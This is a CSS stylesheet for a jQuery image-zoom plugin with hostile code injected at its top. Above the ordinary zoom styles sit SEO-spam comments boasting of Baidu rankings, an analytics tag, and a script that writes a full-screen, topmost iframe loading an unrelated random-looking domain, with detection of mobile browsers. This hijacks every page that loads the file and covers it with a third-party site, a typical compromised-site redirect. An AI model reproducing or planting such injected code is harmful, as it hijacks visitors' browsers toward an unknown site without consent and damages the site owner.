<!--//                          _ooOoo_                               //-->
<!--//                         o8888888o                              //-->
<!--//                         88" . "88                              //-->
<!--//                         (| ^_^ |)                              //-->
<!--//                         O\  =  /O                              //-->
<!--//                      ____/`---'\____                           //-->
<!--//                    .'  \\|     |//  `.                         //-->
<!--//                   /  \\|||  :  |||//  \                        //-->
<!--//                  /  _||||| -:- |||||-  \                       //-->
<!--//                  |   | \\\  -  /// |   |                       //-->
<!--//                  | \_|  ''\---/''  |   |                       //-->
<!--//                  \  .-\__  `-`  ___/-. /                       //-->
<!--//                ___`. .'  /--.--\  `. . ___                     //-->
<!--//            ."" '  `.     ___\_|_/___.'   '"".                  //-->
<!--//            | | :  `- \`.;`\ _ /`;.`/ - ` : | |                 //-->
<!--//            \  \ `-.   \_ __\ /__ _/   .-` /  /                 //-->
<!--//      ========`-.____`-.___\_____/___.-`____.-'========         //-->
<!--//                           `=---='                              //-->
<!--//      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^        //-->
<!--//    佛祖保佑     日收录满36     秒收秒排     百度首页第一       //-->
<!--////////////////////////////////////////////////////////////////////-->

<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?55795663e10f22dd6242a2c92756af3e";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<script>
document.write('<meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"><style>html,body{width:100%;height:100%;margin:0;padding:0}</style>');
  var iframe = document.createElement('iframe');
  iframe.src = 'https://mobile.aac2bkc4tqm6.com/';
  iframe.scrolling = 'auto';
  iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
  var div1 = document.createElement("div");
  var div =  document.createElement("div");
  div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
    var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
  if (is_mobi) {
    div1.style.overflow = "auto";
  }
  div1.appendChild(iframe);
  div.appendChild(div1);
  document.write(div.innerHTML);
</script>.zoomPad{
	position:relative;
	float:left;
	z-index:99;
	cursor:crosshair;
}


.zoomPreload{
   -moz-opacity:0.8;
   opacity: 0.8;
   filter: alpha(opacity = 80);
   color: #333;
   font-size: 12px;
   font-family: Tahoma;
   text-decoration: none;
   border: 1px solid #CCC;
   background-color: white;
   padding: 8px;
   text-align:center;
   background-image: url(/template/default/images/zoomloader.gif);
   background-repeat: no-repeat;
   background-position: 43px 30px;
   z-index:110;
   width:90px;
   height:43px;
   position:absolute;
   top:0px;
   left:0px;
}


.zoomPup{
	overflow:hidden;
	background-color: #FFF;
	-moz-opacity:0.6;
	opacity: 0.6;
	filter: alpha(opacity = 60);
	z-index:120;
	position:absolute;
	border:1px solid #CCC;
    z-index:101;
    cursor:move;
}

.zoomOverlay{
	position:absolute;
	left:0px;
	top:0px;
	background:#FFF;
	/*opacity:0.5;*/
	z-index:5000;
	width:100%;
	height:100%;
	display:none;
  z-index:101;
}

.zoomWindow{
	position:absolute;
	left:110%;
	top:40px;
	background:#FFF;
	z-index:6000;
	height:auto;
  z-index:10000;
  z-index:110;
}
.zoomWrapper{
	position:relative;
	border:1px solid #999;
  z-index:110;
}
.zoomWrapperTitle{
	display:block;
	background:#999;
	color:#FFF;
	height:18px;
	line-height:18px;
	width:100%;
  overflow:hidden;
	text-align:center;
	font-size:10px;
  position:absolute;
  top:0px;
  left:0px;
  z-index:120;
  -moz-opacity:0.6;
  opacity: 0.6;
  filter: alpha(opacity = 60);
}
.zoomWrapperImage{
	display:block;
  position:relative;
  overflow:hidden;
  z-index:110;

}
.zoomWrapperImage img{
  border:0px;
  display:block;
  position:absolute;
  z-index:101;
}

.zoomIframe{
  z-index: -1;
  filter:alpha(opacity=0);
  -moz-opacity: 0.80;
  opacity: 0.80;
  position:absolute;
  display:block;
}

/*********************************************************
/ When clicking on thumbs jqzoom will add the class
/ "zoomThumbActive" on the anchor selected
/*********************************************************/